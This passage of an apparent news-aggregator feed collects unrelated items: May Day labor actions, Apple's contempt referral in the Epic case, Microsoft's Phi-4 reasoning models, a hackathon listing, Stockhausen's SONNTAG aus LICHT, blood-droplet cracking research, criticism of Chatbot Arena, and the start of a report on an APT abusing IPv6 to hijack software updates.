. But one thing is for sure: Working people will be flexing their collective muscles in a range of arenas in class struggle, from saving Medicaid to standing up for federal workers, nurses, immigrants and any human being whose rights are being trampled on by Trump and his minions. May Day will be a national demonstration that will polarize today’s struggle not along resentful, racist lines of immigrant vs. “native,” but along the class-struggle lines of workers vs. billionaires.
In Chicago, the site of the 1886 Haymarket affair that sparked the May Day holiday, the organizing got started with an in-person convening in March, followed by online meetings that drew thousands of participants. The CTU, Arise Chicago and dozens of other labor unions and community organizations will lead a march at 11a.m. from Unity Park to Grant Park. The action not only honors the pitched battle for an eight-hour day in 1886, but also the 400,000-person march on May 1, 2006 to defeat a measure criminalizing undocumented immigrants. A loose coalition of immigrant rights organizations in Chicago is organizing one-day strikes, distributing letters through social media and other channels reminding workers of their right to withhold their labor to protest unfair labor practices at their workplaces.
Minnesota will have a
full day of actions
, including a rally of airport workers at 12 p.m. to stand up to Trump and Musk as well as to corporations like Delta, Uber, Lyft and the Metropolitan Airports Commission. Anchoring organizations include local immigrant rights groups and SEIU Local 26, UNITE HERE Local 17, the Flight Attendants, the Machinists, Teamsters Local 120, and AFGE. Later at 5 p.m., a unity rally at the state Capitol is expected to draw tens of thousands, and will include liberal anti-Trump groups like Indivisible.
In Philadelphia, Sen. Bernie Sanders (I-Vt.) will headline a hundreds-strong rally at City Hall with local labor and immigration-rights leaders. In New Orleans, hundreds of registered nurses at University Medical Center will go on strike as they
negotiate
for a first contract.
California will see some of the largest actions. Twenty thousand healthcare, research and technical workers across the University of California system have timed their unfair labor practice strike for May 1. Their union, UPTE of Communications Workers Local 9119, is striking because UC
announced
a systemwide hiring freeze on March 19, 2025, using Trump’s threatened cuts as cover, without giving the union notice or an opportunity to bargain.
UPTE President Dan Russell, who was elected as part of a reform slate in 2021, says the University of California is “using the political climate as an excuse for the behavior that they had already been exhibiting … which is refusing to bargain in good faith to address the staffing crisis, and just continuing to commit, you know, one unfair labor practice after another.”
AFSCME Local 3299, representing more than 37,000 patient care workers across the same UC system, also plans a
walk-out
on May Day over similar illegal hiring freeze allegations. “The University of California sits on $10 billion in unrestricted reserves,” says Todd Stenhouse, spokesperson for AFSCME 3299. “It has routinely handed out raises of 30-40% to its growing legion of Ivory Tower elites, chancellors and the like. It provides them low-interest home loans. They can use them to buy second homes. And all the while the front liners, the people that answer the call button, people that are sweeping the floors, people that are serving the food right, are struggling like never before to make ends meet.
“International Workers Day is a time for workers to celebrate the ongoing struggle, but it is also a time to reclaim our voice in a very uncertain time against employers who, frankly, don’t know what it means to walk in our shoes.”
At noon, the expected 60,000 will swell in number as other unions join in solidarity rallies across California, including the United Auto Workers 4811, UC-AFT 1474, Teamsters Local 2010, and the California Nurses Association. There’s also a planned teach-in at 1:30 p.m.
In Georgia, the Union of Southern Service Workers is planning a march on Atlanta City Hall alongside partnering organizations, including the Coalition of Black Trade Unionists, Atlanta Jobs with Justice, United Campus Workers, Georgia Latino Alliance for Human Rights and the Indivisible Project. Planned stops include an immigrant detention center and a local OSHA office.
Katie Giede, an 11-year server at Waffle House and member of the Union of Southern Service Workers, said she would be marching to take on billionaires like Waffle House boss Joe Rogers III. Last year, she and her co-workers
pressured
their employer to raise wages from $2.92 to $5.25 hourly in two years across most markets.
LUIS FELIZ LEON
is an associate editor and organizer at
Labor Notes
.
Apple referred to federal prosecutors after judge rules it violated court order
Guardian
www.theguardian.com
2025-05-01 02:59:01
Judge says executive told ‘outright lies’ when he gave testimony in antitrust case from Fortnite maker Epic Games Apple violated a United States court order that required the iPhone maker to allow greater competition for app downloads and payment methods in its lucrative App Store and will be referr...
Apple violated a United States court order that required the iPhone maker to allow greater competition for app downloads and payment methods in its lucrative App Store and will be referred to federal prosecutors, a federal judge in California ruled on Wednesday.
The US district judge Yvonne Gonzalez Rogers in Oakland said in an 80-page ruling that Apple failed to comply with her prior injunction order, which was imposed in an antitrust lawsuit brought by
Fortnite
maker Epic Games.
“Apple’s continued attempts to interfere with competition will not be tolerated,” Gonzalez Rogers said. She added: “This is an injunction, not a negotiation. There are no do-overs once a party willfully disregards a court order.“
Gonzalez Rogers referred Apple and one of its executives, Alex Roman, vice-president of finance, to federal prosecutors for a criminal contempt investigation into their conduct in the case.
Roman gave testimony about the steps Apple took to comply with her injunction that was “replete with misdirection and outright lies”, the judge wrote.
Apple and its lawyers did not immediately respond to requests for comment.
The Epic Games chief executive Tim Sweeney called the judge’s order a significant win for developers and consumers.
“It forces Apple to compete with other payment services rather than blocking them, and this is what we wanted all along,” Sweeney told reporters.
Sweeney said Epic Games would aim to bring Fortnite back to the Apple App Store next week. Apple in 2020 had pulled Epic’s account after the company let iPhone users navigate outside Apple’s ecosystem for better payment deals.
Epic accused Apple of stifling competition for app downloads and overcharging commissions for in-app purchases.
Gonzalez Rogers in 2021 found Apple violated a California competition law and ordered the company to allow developers more freedom to direct app users to other payment options. Apple failed last year to persuade the US supreme court to strike down the injunction.
Epic Games told the court in March 2024 that Apple was “blatantly” violating the court’s order, including by imposing a new 27% fee on app developers when Apple customers completed an app purchase outside the App Store. Apple charges developers a 30% commission fee for purchases within the App Store.
Apple also began displaying messages warning customers of the potential danger of external links in order to deter non-Apple payments, Epic Games alleged, calling Apple’s new system “commercially unusable”.
Apple has denied any wrongdoing. The company in a court filing on 7 March told Gonzalez Rogers it had undertaken “extensive efforts” to comply with the injunction “while preserving the fundamental features of Apple’s business model and safeguarding consumers”.
Gonzalez Rogers suggested at an earlier hearing that changes made by Apple to its App Store had no purpose “other than to stifle competition”.
In Wednesday’s ruling, Gonzalez Rogers said Apple is immediately barred from impeding developers’ ability to communicate with users, and the company must not levy its new commission on off-app purchases.
She said Apple cannot ask her to pause her ruling “given the repeated delays and severity of the conduct”. She took no view on whether a criminal case should be opened.
“It will be for the executive branch to decide whether Apple should be deprived of the fruits of its violation, in addition to any penalty geared to deter future misconduct,” the judge wrote.
Show HN: Convert Large CSV/XLSX to JSON or XML in Browser
Microsoft continues to add to the conversation by unveiling its newest models, Phi-4-reasoning, Phi-4-reasoning-plus, and Phi-4-mini-reasoning.
A new era of AI
One year ago, Microsoft introduced
small language models
(SLMs) to customers with the release of
Phi-3
on
Azure AI Foundry
, leveraging research on SLMs to expand the range of efficient AI models and tools available to customers.
Today, we are excited to introduce
Phi-4-reasoning, Phi-4-reasoning-plus, and Phi-4-mini-reasoning
—marking a new era for small language models and once again redefining what is possible with small and efficient AI.
Reasoning models, the next step forward
Reasoning models
are trained to leverage inference-time scaling to perform complex tasks that demand multi-step decomposition and internal reflection. They excel in mathematical reasoning and are emerging as the backbone of agentic applications with complex multi-faceted tasks. Such capabilities are typically found only in large frontier models. Phi- reasoning models introduce a new category of small language models. Using distillation, reinforcement learning, and high-quality data, these models balance size and performance. They are small enough for low-latency environments yet maintain strong reasoning capabilities that rival much bigger models. This blend allows even resource-limited devices to perform complex reasoning tasks efficiently.
Phi-4-mini-reasoning
Phi-4-mini-reasoning
is designed to meet the demand for a compact reasoning model. This transformer-based language model is optimized for mathematical reasoning, providing high-quality, step-by-step problem solving in environments with constrained computing or latency. Fine-tuned with synthetic data generated by Deepseek-R1 model, Phi-4-mini-reasoning balances efficiency with advanced reasoning ability. It’s ideal for educational applications, embedded tutoring, and lightweight deployment on edge or mobile systems, and trained on over one million diverse math problems spanning multiple levels of difficulty from middle school to Ph.D. level. Try out the model on
Azure AI Foundry
or
HuggingFace
today.
Figure 1. The graph compares the performance of various models on popular math benchmarks for long sentence generation. Phi-4-mini-reasoning outperforms its base model on long sentence generation across each evaluation as well as larger models like OpenThinker-7B*, Llama-3.2-3B-instruct, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Llama -8B, and Bespoke-Stratos-7B*. Phi-4-mini-reasoning is comparable to OpenAI o1-mini* across math benchmarks, surpassing the model’s performance during Math-500 and GPQA Diamond evaluations. As seen above, Phi-4-mini-reasoning with 3.8B parameters outperforms models of over twice its size.
For more information about the model, read the
technical report
that provides additional quantitative insights.
Phi-4-reasoning and Phi-4-reasoning-plus
Phi-4-reasoning
is a 14-billion parameter open-weight reasoning model that rivals much larger models on complex reasoning tasks. Trained via supervised fine-tuning of Phi-4 on carefully curated reasoning demonstrations from OpenAI o3-mini, Phi-4-reasoning generates detailed reasoning chains that effectively leverage additional inference-time compute. The model demonstrates that meticulous data curation and high-quality synthetic datasets allow smaller models to compete with larger counterparts. This model is available now on Azure AI Foundry and HuggingFace.
Phi-4-reasoning-plus builds upon Phi-4-reasoning capabilities, further trained with reinforcement learning to utilize more inference-time compute, using 1.5x more tokens than Phi-4-reasoning, to deliver higher accuracy. This model is coming to Azure AI Foundry soon, but available today on HuggingFace.
Despite their significantly smaller size, both models achieve better performance than OpenAI o1-mini and DeepSeek-R1-Distill-Llama-70B at most benchmarks, including mathematical reasoning and Ph.D. level science questions. They achieve performance better than the full DeepSeek-R1 model (with 671-billion parameters) on the AIME 2025 test, the 2025 qualifier for the USA Math Olympiad.
Figure 2. Phi-4-reasoning performance across representative reasoning benchmarks spanning mathematical and scientific reasoning. We illustrate the performance gains from reasoning-focused post-training of Phi-4 via Phi-4-reasoning (SFT) and Phi-4-reasoning-plus (SFT+RL), alongside a representative set of baselines from two model families: open-weight models from DeepSeek including DeepSeek R1 (671B Mixture-of-Experts) and its distilled dense variant DeepSeek-R1 Distill Llama 70B, and OpenAI’s proprietary frontier models o1-mini and o3-mini. Phi-4-reasoning and Phi-4-reasoning-plus consistently outperform the base model Phi-4 by significant margins, exceed DeepSeek-R1 Distill Llama 70B (5x larger) and demonstrate competitive performance against significantly larger models such as Deepseek-R1.
Figure 3. Accuracy of models across general-purpose benchmarks for: long input context QA (FlenQA), instruction following (IFEval), Coding (HumanEvalPlus), knowledge & language understanding (MMLUPro), safety detection (ToxiGen), and other general skills (ArenaHard and PhiBench).
Phi-4-reasoning models introduce a major improvement over Phi-4, surpass larger models like DeepSeek-R1-Distill-70B and approach Deep-Seek-R1 across various reasoning and general capabilities, including math, coding, algorithmic problem solving, and planning. The
technical report
provides extensive quantitative evidence of these improvements through diverse reasoning tasks.
Phi’s evolution over the last year has continually pushed this envelope of quality vs. size, expanding the family with new to address diverse needs. Across the scale of Windows 11 devices, these models are available to run locally on CPUs and GPUs.
As Windows works towards creating a new type of PC, Phi models have become an integral part of Copilot+ PCs with the NPU-optimized
Phi Silica variant
. This highly efficient and OS-managed version of Phi is designed to be preloaded in memory, and available with blazing fast time to first token responses, and power efficient token throughput so it can be concurrently invoked with other applications running on your PC.
It is used in core experiences like
Click to Do
providing useful text intelligence tools for any content on your screen and is available as
developer APIs
to be readily integrated into applications—already being used in several productivity applications like Outlook offering its Copilot summary features offline. These small but mighty models have already been optimized and integrated to be used across several applications across the breadth of our PC ecosystem. The Phi-4-reasoning and Phi-4-mini-reasoning models leverage the low-bit optimizations for Phi Silica and will be available to run soon on Copilot+ PC NPUs.
Safety and Microsoft’s approach to responsible AI
At Microsoft,
responsible AI
is a fundamental principle guiding the development and deployment of AI systems, including our Phi models. Phi models are developed in accordance with Microsoft AI principles: accountability, transparency, fairness, reliability and safety, privacy and security, and inclusiveness.
The Phi family of models has adopted a robust safety post-training approach, leveraging a combination of Supervised Fine-Tuning (SFT), Direct Preference Optimization (DPO), and Reinforcement Learning from Human Feedback (RLHF) techniques. These methods utilize various datasets, including publicly available datasets focused on helpfulness and harmlessness, as well as various safety-related questions and answers. While the Phi family of models is designed to perform a wide range of tasks effectively, it is important to acknowledge that all AI models may exhibit limitations. To better understand these limitations and the measures in place to address them, please refer to the model cards below, which provide detailed information on responsible AI practices and guidelines.
GroMo brings you the
FinArva AI Hackathon 2025
,
powered by
AWS
- a high-energy, fast-paced challenge to solve India’s toughest financial distribution problems using AI and product innovation.
This is your chance to design intelligent solutions for Bharat's next billion users. Selected participants will get exclusive mentorship, showcase their ideas in front of top fintech leaders, and compete for prizes worth
₹10,00,000+
.
The Problem Statement for the Phase 1 (Idea Discovery & Concept Submission) can be accessed from here:
Click Here
Opportunity to get Direct Interview with Founders with CTC upto
₹ 25 LPA (Upto 40LPA for experienced professionals)
Build AI solutions that address real distribution challenges
Get mentored by leaders from GroMo, AWS, and the fintech ecosystem
Present your ideas to a panel of FinTech Leaders
Win cash prizes, goodies, and fast-track career opportunities
Network with peers, leaders & potential employers
Winning Criteria
Problem Understanding:
The solution should demonstrate a deep understanding of the real challenges faced by GroMo Partners and the solution should be designed around those needs.
Innovativeness
: The idea has to be original, creative, and should bring a fresh approach to solving the problem effectively.
Business Impact
: The solution should have strong potential to improve GroMo Partner earnings, efficiency, or experience.
Effective Use of AI
: AI should not be just an add-on—it should be central to the solution and used in a meaningful, well-integrated way.
Simplicity & Usability
: The product should be easy to use, scalable, and ready to be adopted by GroMo’s wide partner base with minimal friction.
Eligibility
Open to all
college students, working professionals, and AI enthusiasts.
The team size for the Hackathon is 3-5 Members.
Individual participants or teams with fewer than 3 members can register and submit proposals in Phase 1. If shortlisted, they will be paired with other participants to form a team of 3–5 members for the in-person hackathon.
About the interview
Phase 1: Idea Discovery & Concept Submission
Registered teams have to work on the virtual ideation and concept submission focused on understanding GroMo’s Partners' challenges. The idea needs to cover - Top 3 User problems you're solving, Proposed AI-based solutions, Why it will work and how it helps increase User earnings and Mocks or high-level system flow (Optional). The submission can be any format - PDF/ Document/ PPT/ Zip file. Only the team leader will be allowed to make the submission.
29 Apr'25-19 May'25
Phase 2: In-Person Hackathon (Build + Pitch)
Selected teams attend the in-person event in Gurgaon for a 3-day build sprint with GroMo mentors. The travel has to be self-managed by the participants. Lodging & meals will be covered by GroMo. The event will include 48 hours of Unstoppable AI Innovation followed by a Pitch to the Jury.
30 May'25-1 Jun'25
About
GroMo
Building India's largest financial products distribution company
Bringing a landslide shift in the $300B+ Financial products market in India. GroMo is a Y Combinator (YC21) backed Series-A startup having raised $12M+ in overall funding .
We have backing from several large international funds and notable angel investors such as SIG, Y Combinator, Beyond Next Ventures, Das Capital, Kunal Shah(CRED, Freecharge), Ramakant Sharma(Livspace), Alok Mittal(Indifi, IAN), Nitin Gupta (Uni, Founder PayU), Utsav Somani (Angel list India, iSEED), Niraj Singh (Spinny), Ashish Sharma, and many more.
Both co-founders,
Ankit
and
Darpan
, are from IIT Delhi and have entrepreneurship experience in the tech space itself and have built (and sold) successful companies in the past
Our team comprises dedicated ex-entrepreneurs and mavericks who have a passion to build great things and change lives, with varied experience in companies such as Flipkart, Spinny, Policybazaar, Aviva Life, Snapdeal, Oracle, Housing, Unicommerce, Lambda Test, and many more...
At
GroMo
, we deeply understand how financial products such as Demat Account, Saving Account, Loans, Insurance, etc. are sold and we want to empower Millions of agents and financial advisors to
sell financial products
with the power of technology. Our ability to understand what customers want, build fast and iterate faster makes us stand far apart from our competitors.
It all starts with the right team — a team that deeply cares about values, customers, and each other.
Sunday from Light (1998-2003)
for 10 vocal soloists, boy’s voice, four instrumental soloists
(bassett horn, flute, trumpet, synthesizer), two choirs, two orchestras,
electronic music.
SONNTAG aus LICHT (Sunday From Light) is the 7th and final opera in Karlheinz Stockhausen's "7 day" LICHT (Light) opera cycle, following
MITTWOCH aus LICHT
. SONNTAG is characterized as the "Day of Mystical Union" between the LICHT protagonists MICHAEL and EVE. In the opening Scene of this 5-part production, an orchestra atomizes and rotates the themes of MICHAEL and
EVE, after which a procession of "Angels" praises their union. The scene "Light Pictures"
reflects the courtship between these two characters in a 3-way "shadow-play", and seven "Scents of the
Week" are celebrated. Finally, an orchestra and choir take turns
to finalize this union with "recollections" of scenes from each day of
LICHT. The scenes in SONNTAG do not have a dramatic arc connecting them,
instead the actual theme of union between the characters Michael and Eve are achieved
through musical, visual, spatial and even olfactory means.
Scene 1: LICHTER–WASSER (SONNTAGS-GRUSS)/(Light-Waters, or Sunday Greeting)
For soprano, tenor, and orchestra (29 pcs.) with synthesizer. Composed 1998-1999, premiered 1999 during the Donaueschinger Musiktage (Southwest German Radio).
After an introductory duet, the tenor and soprano soloists lead members of the orchestra to appointed locations situated throughout the audience seating area. After each player has reached his/her spot, a candle is lit (the "Light" of the title). During this opening ritual a complex harmony slowly builds from broad held figures. The main section of this Scene is characterized by short melodic fragments (based in the LICHT Michael and Eve melody themes) passed around by members of the orchestra in two layers. This results in "waves" of melodies circling around the audience hall in separate tempos. This structure is interrupted by several soloistic interludes, as well as a section where some musicians "ascend" to an elevated stage for a narrative scene. At the end, each player drinks from a bowl of water (the "Water" of the title) and depart.
Scene 2: ENGEL-PROZESSIONEN (Angel Processions)
For choir (a cappella). Composed 2000, premiered 2002 at the Concertgebouw in Amsterdam.
In ENGEL-PROZESSIONEN, the setting is a hall lined with a mixed choir along the rear and side walls (a "Tutti Choir"), singing slow, quiet tones and aleatoric syllables. Promenading through the audience are 7 singing "Angel Choirs" (choir groups of 4 to 6 singers) using texts from 7 different languages. A tenor and soprano lead the choir members in synchronized hand gestures. The 7th Angel Choir, the Angels of Joy, also sometimes sings from the balcony (echoing the "elevated" section of the 1st Scene). During this Scene, the 7 Angel Choirs sing in various vocal combinations (layered configurations of 2-part polyphony) while promenading in ritualistic fashion throughout the performance space. Since the theme of SONNTAG AUS LICHT is "mystical union", the polyphonic EVE and MICHAEL layers of each Angel Choir gradually meld together (Duality to unity) as the Scene progresses into a homophonic texture at the end, at which point each Angel Choir proceeds up the middle of the hall and converges, bringing irises and lilies to form a mountain of flowers.
Scene 3: LICHT-BILDER (Light Pictures)
For tenor vocalist, trumpet with ring-modulation, basset-horn, and flute/alto flute with ring-modulation. Composed 2002-2003, premiered 2004.
In this Scene the tenor vocalist and basset-horn soloist navigate through "backwards-ordered" fragments of the Michael and Eve themes. The trumpet and flute play staggered variations of the tenor and bassett-horn (effectively acting as rippling "reflections). The sounds of the trumpet and flute are also processed through a digital ring-modulation effect, which adds a further "warped reflection" to the musical texture (these sounds are projected from the rear of the hall). Throughout this performance the performers also move about the space in motions reflective of the musical material. Divided into 7 sections (one for each day of the week), the polyphonic texture of this Scene is broken up by several interludes based on harmonized duos, trios and quartets. The libretto sung by the tenor soloist is made up of non-grammatical words and phrases which praise God and correspond to the "essences of seven spheres of life".
Scene 4: DÜFTE - ZEICHEN (Scents - Signs)
For 7 vocalists, boy’s voice, synthesizer. Composed 2002, premiered 2003 at the Salzburg Festival.
In this Scene, Stockhausen celebrates each of the 7 Days of the Week with it's own Scent and an explanation of its Sign. The main body of this Scene features six vocalists singing in solos, duets and trios, each containing text describing the basic themes of each Day of the Week. During each of the 7 primary "song-scenes" incense is lit (aromatic bowl), banners are unfurled, and hand gestures are made. These songs are separated and supported by ensemble sequences in free-rhythms. A synthesizer adds various embellishments to each of the songs, becoming more and more complex as the Scene develops. At the end are 2 additional songs where a youth from the audience is taken into the sky on a flying horse (the alto song sequence also features a richly-harmonized "Overtone Chant").
Scene 5: HOCH-ZEITEN ("High-Times", or "Wedding/Marriage")
For choir and orchestra. Composed 2001-2002, premiered 2003 at Las Palma.
HOCH-ZEITEN is performed simultaneously by both a choir and an orchestra situated in two separate halls. Since the theme of SONNTAG is "mystical union", audio/video signals are broadcast from one hall into the other during several "Blend-ins" (physically, however, the 2 musical ensembles are completely separate). Typically, an audience will experience a performance of one group in the first hall, and then move into the other hall as the performance is repeated (in other words, the performers exchange audiences between two performances of the same work). The music itself is based around held tones (drones) making a 5-part harmony (and 5 different languages for the choir), with different types of ornamentation featured. These various ornamental articulations are meant to "speak" to each other, using the 5 languages applied to the 5 layers. In addition to the "Blend-ins", the orchestral version has 7 "Memories", where a featured duet/trio occurs. Here, quotes of musical passages from previous Scenes of the LICHT opera cycle appear. These instrumental "Memories" are also heard in the choral version through the orchestral "Blend-ins".
SONNTAGS-ABSCHIED ("Sunday Farewell")
For 5 Synthesizers. Composed and premiered in 2003.
In 2004, the music for HOCH-ZEITEN was adapted for 5 synthesizers. Five performer-programmers (Layers 1-5: Marc Maes, Frank Gutschmidt, Fabrizio Rosso, Benjamin Kobler and Antonio Pérez Abellán) worked with Stockhausen to translate the choir version manuscript into synthetic tones, while preserving the linguistic aspects of the text. When staged, video projections of the keyboardists' hands can be projected onto screens above each player. This version can also be performed by 1 synthesizer accompanied by a tape of the other 4 parts, in which case it is named KLAVIERSTÜCK XIX (Piano Piece 19). Another version of this piece exists as STRAHLEN, which is for multiple vibraphones (some processed digitally).
Sunday From Light celebrates the final convergence and joining of the protagonists Michael and Eve, and therefore minimizes the influence of Lucifer, the LICHT Cycle's antagonist. As Lucifer represents a more conservative, "restrictive" theme, his absence allows this final day of LICHT to have a very open feeling - evocative of an almost ethereal, open-air ritual celebration. Additionally, this final opera presents refined explorations of elements found in earlier points of Stockhausen's half-century career, from the "pointillistic" orchestral textures of Light-Waters (see PUNKTE), to the movement-based, ring-modulated chamber pieces of Light-Pictures (MANTRA), to the spacially-enhanced ritual drone textures of Angel Processions and High-Times (see STIMMUNG, STERNKLANG, INORI). As a final statement of the LICHT opera cycle however, the composer here unmistakably reaches an apotheosis of sorts for the LICHT superformula.
Dried deposit of a 5 μL blood droplet on a glass surface inclined at 35° to the horizontal, showing differential cracking between the advancing (downhill) and receding (uphill) fronts. The arrow indicates the direction of gravitational acceleration (g). Credit: Bibek Kumar, Sangamitro Chatterjee, Amit Agrawal, Rajneesh Bhardwaj
Drying droplets have fascinated scientists for decades. From water to coffee to paint, these everyday fluids leave behind intricate patterns as they evaporate. But blood is far more complex—a colloidal suspension packed with red blood cells, plasma proteins, salts, and countless biomolecules.
As blood dries, it leaves behind a complex microstructural pattern—cracks, rings, and folds—each shaped by the interplay of its cellular components, proteins, and evaporation dynamics. These features form a kind of physical fingerprint, quietly recording the complex interplay of physics that unfolded during the desiccation of the droplet.
In our recent experiments, we explored how blood droplets dry by varying both their size—from tiny 1-microliter drops to larger 10-microliter ones—and the angle of the surface, from completely horizontal to a steep 70° incline. Using an
optical microscope
, a
high-speed camera
, and a surface profiler, we tracked how the droplets dried, shrank and cracked.
On flat surfaces, blood droplets dried predictably, forming familiar coffee-ring-like deposits surrounded by networks of radial and azimuthal cracks. But as we increased the tilt, gravity pulled the red blood cells downhill, while
surface tension
tried to hold them up. This resulted in asymmetric deposits and stretched patterns—a kind of biological landslide frozen in time.
Cracking patterns were different on the advancing (downhill) and receding (uphill) sides. On the advancing side, where the dried blood mass accumulated more, the cracks were thicker and more widely spaced. On the receding side, where the deposit thinned out, the cracks were finer. Larger droplets (10 microliter) exaggerated the asymmetry even more, with gravity playing a bigger role as the
droplets
grew heavier—leaving behind a long, thin "tail" of blood that dried and showed scattered dried
red blood cells
.
To explain what we observed, we developed a first-order theoretical model showing how
mechanical stresses
build up unevenly on either side of the droplet—a difference that helps explain the asymmetric cracking patterns we saw.
These findings have real-world implications. In
forensic science
, for example, investigators use bloodstain pattern analysis—or BPA—to reconstruct events at crime scenes. Our results suggest that both the tilt of the surface and the size of the droplet can significantly alter the resulting patterns. Ignoring these factors could lead to misinterpretations, potentially affecting how such evidence is read and understood.
This story is part of
Science X Dialog
, where researchers can report findings from their published research articles.
Visit this page
for information about Science X Dialog and how to participate.
More information:
Bibek Kumar et al, Asymmetric Deposits and Crack Formation during Desiccation of a Blood Droplet on an Inclined Surface,
Langmuir
(2025).
DOI: 10.1021/acs.langmuir.4c03767
Bibek Kumar is a Ph.D. candidate in the Department of Mechanical Engineering at I.I.T. Bombay, Mumbai, India. Sangamitro Chatterjee is an Assistant Professor in the Department of Physics at DIT University, Dehradun, India. Amit Agrawal and Rajneesh Bhardwaj are Professors in the Department of Mechanical Engineering at I.I.T. Bombay.
Citation
:
Blood droplets on inclined surfaces reveal new cracking patterns (2025, April 30)
retrieved 1 May 2025
from https://phys.org/news/2025-04-blood-droplets-inclined-surfaces-reveal.html
This document is subject to copyright. Apart from any fair dealing for the purpose of private study or research, no
part may be reproduced without the written permission. The content is provided for information purposes only.
Understanding the recent criticism of the Chatbot Arena
The
Chatbot Arena
has become the go-to place for
vibes-based evaluation
of LLMs over the past two years. The project, originating at UC Berkeley, is home to a large community of model enthusiasts who submit prompts to two randomly selected anonymous models and pick their favorite response. This produces an
Elo score
leaderboard of the “best” models, similar to how chess rankings work.
It’s become one of the most influential leaderboards in the LLM world, which means that billions of dollars of investment are now being evaluated based on those scores.
The Leaderboard Illusion
A new paper,
The Leaderboard Illusion
, by authors from Cohere Labs, AI2, and Princeton, Stanford, Waterloo, and Washington universities spends 68 pages dissecting and criticizing how the arena works.
Even prior to this paper there have been rumbles of dissatisfaction with the arena for a while, based on intuitions that the best models were not necessarily bubbling to the top. I’ve personally been suspicious of the fact that my preferred daily driver, Claude 3.7 Sonnet, rarely breaks the top 10 (it’s sat at 20th right now).
This all came to a head a few weeks ago when the
Llama 4 launch
was mired by a leaderboard scandal: it turned out that their model which topped the leaderboard
wasn’t the same model
that they released to the public! The arena released
a pseudo-apology
for letting that happen.
This helped bring focus to
the arena’s policy
of allowing model providers to anonymously preview their models there, in order to earn a ranking prior to their official launch date. This is popular with their community, who enjoy trying out models before anyone else, but the scale of the preview testing revealed in this new paper surprised me.
From the new paper’s abstract (highlights mine):
We find that undisclosed private testing practices benefit a handful of providers who are able to test multiple variants before public release and retract scores if desired. We establish that the ability of these providers to choose the best score leads to biased Arena scores due to selective disclosure of performance results.
At an extreme, we identify 27 private LLM variants tested by Meta in the lead-up to the Llama-4 release
.
If proprietary model vendors can submit dozens of test models, and then selectively pick the ones that score highest it is not surprising that they end up hogging the top of the charts!
This feels like a classic example of gaming a leaderboard. There are model characteristics that resonate with evaluators there that may not directly relate to the quality of the underlying model. For example, bulleted lists and answers of a very specific length tend to do better.
It is worth noting that this is quite a salty paper (highlights mine):
It is important to acknowledge that
a subset of the authors of this paper have submitted several open-weight models to Chatbot Arena
: command-r (Cohere, 2024), command-r-plus
(Cohere, 2024) in March 2024, aya-expanse (Dang et al., 2024b) in October 2024, aya-vision
(Cohere, 2025) in March 2025, command-a (Cohere et al., 2025) in March 2025. We started this extensive study driven by this submission experience with the leaderboard.
While submitting Aya Expanse (Dang et al., 2024b) for testing,
we observed that our open-weight model appeared to be notably under-sampled compared to proprietary models
— a discrepancy that is further reflected in Figures 3, 4, and 5. In response,
we contacted the Chatbot Arena organizers to inquire about these differences
in November 2024.
In the course of our discussions, we learned that some providers were testing multiple variants privately, a practice that appeared to be selectively disclosed and limited to only a few model providers
. We believe that our initial inquiries partly prompted Chatbot Arena to release
a public blog
in December 2024 detailing their benchmarking policy which committed to a consistent sampling rate across models. However, subsequent anecdotal observations of continued sampling disparities and the presence of numerous models with private aliases motivated us to undertake a more systematic analysis.
To summarize the other key complaints from the paper:
Unfair sampling rates
: a small number of proprietary vendors (most notably Google and OpenAI) have their models randomly selected in a much higher number of contests.
Transparency
concerning the scale of proprietary model testing that’s going on.
Unfair removal rates
: “We find deprecation disproportionately impacts open-weight and open-source models, creating large asymmetries in data access over”—also “out of 243 public models, 205 have been silently deprecated.” The longer a model stays in the arena the more chance it has to win competitions and bubble to the top.
The Arena responded to the paper
in a tweet
. They emphasized:
We designed our policy to prevent model providers from just reporting the highest score they received during testing. We only publish the score for the model they release publicly.
I’m dissapointed by this response, because it skips over the point from the paper that I find most interesting. If commercial vendors are able to submit dozens of models to the arena and then cherry-pick for publication just the model that gets the highest score, quietly retracting the others with their scores unpublished, that means the arena is very actively incentivizing models to game the system. It’s also obscuring a valuable signal to help the community understand how well those vendors are doing at building useful models.
Here’s
a second tweet
where they take issue with “factual errors and misleading statements” in the paper, but still fail to address that core point. I’m hoping they’ll respond to
my follow-up question
asking for clarification around the cherry-picking loophole described by the paper.
I want more transparency
The thing I most want here is transparency.
If a model sits in top place, I’d like a footnote that resolves to additional information about how that vendor tested that model. I’m particularly interested in knowing how many variants of that model the vendor tested. If they ran 21 different models over a 2 month period before selecting the “winning” model, I’d like to know that—and know what the scores were for all of those others that they didn’t ship.
This knowledge will help me personally evaluate how credible I find their score. Were they mainly gaming the benchmark or did they produce a new model family that universally scores highly even as they tweaked it to best fit the taste of the voters in the arena?
OpenRouter as an alternative?
If the arena isn’t giving us a good enough impression of who is winning the race for best LLM at the moment, what else can we look to?
Andrej Karpathy
discussed the new paper
on Twitter this morning and proposed an alternative source of rankings instead:
It’s quite likely that LM Arena (and LLM providers) can continue to iterate and improve within this paradigm, but in addition I also have a new candidate in mind to potentially join the ranks of “top tier eval”. It is the
OpenRouterAI LLM rankings
.
Basically, OpenRouter allows people/companies to quickly switch APIs between LLM providers. All of them have real use cases (not toy problems or puzzles), they have their own private evals, and all of them have an incentive to get their choices right, so by choosing one LLM over another they are directly voting for some combo of capability+cost.
I don’t think OpenRouter is there just yet in both the quantity and diversity of use, but something of this kind I think has great potential to grow into a very nice, very difficult to game eval.
I only recently learned about
these rankings
but I agree with Andrej: they reveal some interesting patterns that look to match my own intuitions about which models are the most useful (and economical) on which to build software. Here’s a snapshot of their current “Top this month” table:
The one big weakness of this ranking system is that a single, high volume OpenRouter customer could have an outsized effect on the rankings should they decide to switch models. It will be interesting to see if OpenRouter can design their own statistical mechanisms to help reduce that effect.
Hackers abuse IPv6 networking feature to hijack software updates
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 01:33:42
A China-aligned APT threat actor named "TheWizards" abuses an IPv6 networking feature to launch adversary-in-the-middle (AitM) attacks that hijack software updates to install Windows malware. [...]...
A China-aligned APT threat actor named "TheWizards" abuses an IPv6 networking feature to launch adversary-in-the-middle (AitM) attacks that hijack software updates to install Windows malware.
According to ESET, the group has been active since at least 2022, targeting entities in the Philippines, Cambodia, the United Arab Emirates, China, and Hong Kong. Victims include individuals, gambling companies, and other organizations.
The attacks utilize a custom tool dubbed "Spellbinder" by ESET that abuses the IPv6 Stateless Address Autoconfiguration (SLAAC) feature to conduct
SLACC attacks
.
